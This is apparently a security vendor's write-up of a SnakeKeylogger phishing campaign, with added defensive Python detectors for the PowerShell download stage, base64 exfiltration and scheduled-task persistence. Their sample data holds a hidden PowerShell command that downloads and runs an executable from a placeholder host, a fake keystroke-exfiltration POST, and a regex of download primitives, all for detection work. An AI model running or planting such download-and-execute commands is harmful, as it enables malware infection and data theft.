Phishing alert infographic: Spoofed email screenshot with "remittance advice" subject and ISO attachment icon, arrow to PowerShell code downloading SnakeKeylogger, data streams (keystrokes/clipboard) flowing to hacker server; shield icons for sandboxing a

A stealthy info-stealing campaign is deploying SnakeKeylogger malware through phishing emails posing as remittance advice from CPA Global or Clarivate. Spotted on October 7, 2025, the lures use spoofed sender names like "CPA-Payment Files" and subjects such as "remittance advice for the payment dated 07-Oct-2025," urging victims to open attached ISO or ZIP archives that contain a BAT script. The messages carry corporate letterhead images for credibility and slip past basic email filters.


The infection starts when the BAT executes embedded PowerShell commands to download and run SnakeKeylogger from a remote server. ISO files evade ZIP-only scanners, while the dual-stage setup keeps the payload out of the email itself. Once active, the malware logs keystrokes and clipboard data, then compresses and exfiltrates it via HTTP POST to attacker-controlled servers, base64-encoding the body and using standard browser user-agents for stealth.
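The two stages just described leave different traces, and both can be hunted. The following is an added example (not code from the original article or from NPAV) that runs two detections over constructed telemetry: it links a PowerShell process back to a parent cmd.exe that was launched with a .bat and checks the child for download primitives, and it flags HTTP POSTs whose body is opaque base64 to hosts outside an egress allowlist. The process fields, the proxy log layout, the hostnames (all under the reserved .invalid TLD) and the sample bodies are assumptions made for the example; note that the User-Agent is deliberately not used as a signal, because the text says the malware picks a browser-like one.

```python
"""Hunt the BAT -> PowerShell download stage and the base64 HTTP POST
exfiltration stage in constructed logs (example, not real telemetry)."""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Constructed Sysmon-style process-creation records (assumed field names).
PROCESS_EVENTS = [
    {"pid": 4120, "ppid": 1004, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "E:\remittance_advice_07-Oct-2025.bat"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -w hidden -ep bypass -c "
                 "\"iwr http://files.example.invalid/u.exe -OutFile $env:TEMP\\update.exe;"
                 " Start-Process $env:TEMP\\update.exe\"")},
    # Benign admin PowerShell launched from Explorer, no download primitive.
    {"pid": 5001, "ppid": 1004,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

# Cmdlets/classes commonly used to fetch or run remote code from PowerShell.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|invoke-expression|\biex\b)", re.IGNORECASE)


def find_bat_to_powershell_downloads(events):
    """Return PIDs of powershell.exe processes whose parent is a cmd.exe that
    was started with a .bat on its command line and whose own command line
    contains a download or in-memory execution primitive."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if not parent or not parent["image"].lower().endswith("cmd.exe"):
            continue
        if ".bat" not in parent["cmdline"].lower():
            continue
        if DOWNLOAD_PRIMITIVES.search(e["cmdline"]):
            hits.append(e["pid"])
    return hits


# Constructed proxy log: (timestamp, method, url, user-agent, body prefix).
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
PROXY_LOG = [
    ("2025-10-07T09:14:02Z", "GET", "https://www.example.com/", BROWSER_UA, ""),
    ("2025-10-07T09:15:11Z", "POST", "http://a1.files.example.invalid/gate.php",
     BROWSER_UA,
     base64.b64encode(b"[clipboard] user@example.invalid\n[keys] hunter2\n" * 2).decode()),
    ("2025-10-07T09:16:40Z", "POST", "https://www.example.com/api/search",
     BROWSER_UA, "q=remittance&page=1"),
]

ALLOWED_POST_HOSTS = {"www.example.com"}  # constructed egress allowlist

# Long run of base64 alphabet with optional padding and nothing else.
BASE64_BODY = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def looks_base64(body):
    """True if the body is long, base64-alphabet only and decodes cleanly."""
    if not BASE64_BODY.match(body):
        return False
    try:
        base64.b64decode(body, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def find_suspicious_posts(log, allowed_hosts):
    """Flag POSTs to non-allowlisted hosts carrying an opaque base64 body.
    The User-Agent column is ignored on purpose: a browser-like UA is what
    the malware sends, so it cannot separate exfiltration from browsing."""
    findings = []
    for ts, method, url, _ua, body in log:
        host = urlsplit(url).hostname or ""
        if method == "POST" and host not in allowed_hosts and looks_base64(body):
            findings.append((ts, host))
    return findings


if __name__ == "__main__":
    print("bat->powershell download PIDs:", find_bat_to_powershell_downloads(PROCESS_EVENTS))
    print("suspicious POSTs:", find_suspicious_posts(PROXY_LOG, ALLOWED_POST_HOSTS))
```

Both detectors are deliberately structural rather than indicator-based: the first keys on the parent/child relationship and the presence of a download primitive, the second on body shape and destination, so neither depends on the specific file name, hostname or user-agent a given wave of the campaign happens to use.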


For persistence, SnakeKeylogger creates a "SysUpdate" scheduled task that runs hourly from %TEMP%\update.exe. Attackers rotate through multiple subdomains to keep C2 reachable. To defend, train users to question unexpected payment emails, sandbox attachments, monitor PowerShell activity and scheduled-task creation, and use behavior-based EDR to catch process injection. Extend email filters to inspect ISO attachments and block anomalous egress traffic to stop credential theft early.
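The scheduled-task persistence above has a shape that can be audited independently of the task name. The following is an added example (not code from the original article or from NPAV) that parses Task Scheduler task definitions in the XML format that `schtasks /query /xml` exports and that Windows records in a 4698 "scheduled task created" event, and flags any task whose action runs from a user-writable temp or profile directory on a short repetition interval. The two task definitions are constructed for the example, the benign "VendorUpdater" task is a placeholder, and the list of user-writable paths is an assumption a defender would tune to their environment.

```python
"""Audit Task Scheduler XML for temp-dir persistence on a short repeat
interval (example with constructed task definitions, not captured data)."""
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definitions (not exported from a real host).
TASKS = {
    "SysUpdate": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1H</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-10-07T09:20:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\victim\\AppData\\Local\\Temp\\update.exe</Command></Exec>
  </Actions>
</Task>""",
    "VendorUpdater": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\\Program Files\\Vendor\\updater.exe</Command><Arguments>/silent</Arguments></Exec>
  </Actions>
</Task>""",
}

# Locations any interactive user can write to; assumed list, tune per estate.
USER_WRITABLE = re.compile(
    r"(\\appdata\\local\\temp\\|\\appdata\\roaming\\|\\windows\\temp\\|%temp%|%tmp%|%appdata%)",
    re.IGNORECASE)


def iso_duration_minutes(duration):
    """Convert the ISO 8601 durations Task Scheduler uses (PT1H, PT30M, P1D)
    to minutes; returns None for anything it does not recognise."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", duration)
    if not m or duration in ("P", "PT"):
        return None
    days, hours, mins, secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def audit_task(xml_text, max_interval_minutes=60):
    """Return the reasons a task definition looks like temp-dir persistence:
    an Exec action under a user-writable path, or a repetition interval at
    or below max_interval_minutes. An empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    reasons = []
    for cmd in root.findall(".//t:Actions/t:Exec/t:Command", NS):
        if USER_WRITABLE.search(cmd.text or ""):
            reasons.append(f"action runs from user-writable path: {cmd.text}")
    for interval in root.findall(".//t:Repetition/t:Interval", NS):
        minutes = iso_duration_minutes(interval.text or "")
        if minutes is not None and minutes <= max_interval_minutes:
            reasons.append(f"repeats every {interval.text}")
    return reasons


def audit_all(tasks, max_interval_minutes=60):
    """Map task name -> reasons, keeping only tasks with at least one reason."""
    flagged = {}
    for name, xml_text in tasks.items():
        reasons = audit_task(xml_text, max_interval_minutes)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in audit_all(TASKS).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

Matching on the action path and the repetition interval rather than on the name "SysUpdate" means a renamed task in the next wave is still caught; the same XML walk works on a live export (`schtasks /query /xml`) or on the TaskContent field of a 4698 event pulled from the Security log.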
NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, Z Plus Security.